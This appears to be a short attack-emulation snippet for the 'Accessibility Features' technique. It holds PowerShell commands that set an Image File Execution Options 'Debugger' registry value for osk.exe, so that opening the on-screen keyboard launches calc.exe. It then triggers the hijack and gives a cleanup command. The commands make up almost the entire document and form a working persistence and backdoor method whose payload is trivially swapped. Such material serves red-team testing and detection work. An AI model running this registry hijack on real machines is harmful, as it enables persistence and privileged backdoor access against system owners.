
Event Triggered Execution: Accessibility Features


POWERSHELL!!!!!!!!!!!!!!
----------------------------------------------------------

New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" -Name "Debugger" -Value "calc.exe" -PropertyType STRING -Force
osk

----------------------------------------------------------

CLEAN UP
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" -Name "Debugger" -ErrorAction SilentlyContinue


